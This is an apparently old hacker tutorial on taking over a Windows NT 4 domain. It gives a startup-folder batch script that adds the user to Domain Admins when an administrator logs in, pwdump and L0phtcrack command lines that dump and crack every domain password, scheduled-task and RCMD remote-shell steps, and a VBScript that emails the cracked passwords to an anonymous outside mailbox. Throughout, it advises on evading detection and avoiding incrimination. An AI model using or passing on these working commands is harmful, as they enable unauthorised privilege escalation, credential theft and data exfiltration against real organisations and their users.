Hacking an NT 4 Domain from the Desktop - Revisited

by Hi_Risc (a.k.a. ASB)

I previously showed how to gain administrative rights to both the local NT Workstation as well as the whole domain by simply placing the following script in the "C:\WINNT\PROFILES\ALL USERS\START MENU\PROGRAMS\STARTUP folder and having an administrator log in:

echo off
net users %username% password /active /domain /add
net localgroup administrators %username% /add
net group "Domain Admins" %username% /add /domain
net group "Guests" %username% /delete /domain

What I propose to add to this is a complete crack of every password listed in that domain.  These passwords will be emailed to an anonymous mailbox of your choice, (i.e. Hotmail, Lycos, etc.).

To do this, you will need some extensive "inside" information about the domain, namely domain controllers.  Keep in mind that this sort of action would be considered illegal and suspicious to anyone aware - so don't do it, and don't tell that you know how.  The reason I perform(ed) this is because you can learn a lot about the people from their passwords.

To crack the passwords, you will need a couple of applications that are available for free download.  I'm sure we've all heard of L0phtcrack.  In the source distribution of L0phtcrack are some command line executables for dumping passwords from the registry and cracking them with dictionary files and/or brute force.  Specifically, we want the PWDUMP.EXE and the LC_CLI.EXE files from the source.  Optionally, there is also a PASSWD.TXT file that we can use.  It contains some common passwords and runs extremely quickly.  Generally, I use the password file - just for shits and giggles.  It can dramatically reduce the "crack" time.

Taking for granted that we have already gained domain admin rights by some manner, we can easily create a batch file for the dump and crack.  Here is what mine might look like:

echo off
pwdump.exe \\%domaincontroller% > pword.txt
lc_cli.exe -p pword.txt -o passwd.txt -b

This dumps the passwords from the domain controllers registry into a text file named "PWORD.TXT" then runs the LC_CLI.EXE on that output using the password dictionary and brute force.

The actual crack time can take a very long time.  In many cases, it's easier to count crack time in days rather than hours.  Ideally, you would want to have a very fast machine to do the cracking.  The best crack time I can recall is approximately eight hours on nearly 200 user accounts.  This was on an exceptional server that I had access to.  Specifically, I believe it was a single 866 MHz Intel with 1 GB of RAM.

In my current position, I keep my computer running constantly because I have an unnamed distributed application running.  I would highly recommend that you automate these actions so in case the plot has been uncovered you could claim ignorance.  For example, I would schedule the dump, crack, and email to occur in sequence via a script run within the Schedule service.  A task can be added with a command similar to the following:

at \\%servername% %12:01AM% /every Saturday "%path_to_batch_or_executable%"

There is also a tool available in the NT Resource kit called RCMD, which stands for Remote Command.  There are two entities to this, and they are the client and server service.  The client executable is "RCMD.EXE" and the server service install is "RCMDSVC.EXE".

Generally, this would require PCAnywhere access or direct terminal access to get the service installed on the server - unless you're aware that it's already installed.  In the case that it's already installed on the server, you would place the client in the C:\WINNT\SYSTEM32 directory (or anywhere else listed in the path statement).  Open a command prompt: Start -> Run -> "CMD.EXE for the newbies.  Once the prompt is opened, type: "RCMD %servername%".  This opens a shell on the target server and gives you full control over the executables we want to manipulate.  For the sake of safety, I would probably place the files on a network share as read-only, and some inconspicuous user as the owner, i.e. guest.

At this point, we have done all that's necessary to dump and crack the passwords.  What we want to do now is have either the encrypted passwords emailed to us immediately so that we can crack them at our leisure, or actually have the balls to use the target's resources to crack their own passwords as well as their own email system to send it out.  Again, this requires some "knowledge" of the target.  In order to email the passwords (in one form or another) we would have to be sure that the server had a configured email client.  Technically, we could have the email sent from our own desktop, but that might lend itself to incriminating us.

Many shops have the Office suite installed on their servers but may not have an email account configured.  This poses the greatest problem.  Like I said before, we should either know that the server has Outlook configured, or email from the desktop.  One thing that might save us from incrimination is the fact that this all occurs while we're not on the premises.  To do the emailing, I create a Visual Basic Script for automating the process.  I'm really just beginning the learning process myself, so I won't go into much detail regarding the mechanics, because it was largely pieced together from examples I had available to me.

This is a sample of what it might look like:

Option Explicit
Dim objOutlook, clsMessage, clsRecipient, objOutlookAttach

Open Outlook Session
Set objOutlook=CreateObject("Outlook.Application")
Set clsMessage=objOutlook.CreateItem(0) 'Value of 0=MailItem

With clsMessage
Set clsRecipient=clsmessage.Recipients.Add("%InternetEmailAccount")
clsRecipient.type=1 'Value of 1="To"
clsMessage.Body="Here you go!"
clsMessage.Importance=2 'Value of 2=Important
Set objOutlookAttach=Attachments.Add(\\%servername%\%sharename%\%file.txt%")

If not clsRecipient.Resolve Then
End If
End With

Set clsMessage=Nothing
Set objOutlook=Nothing

Code: SendEmailMessage.vbs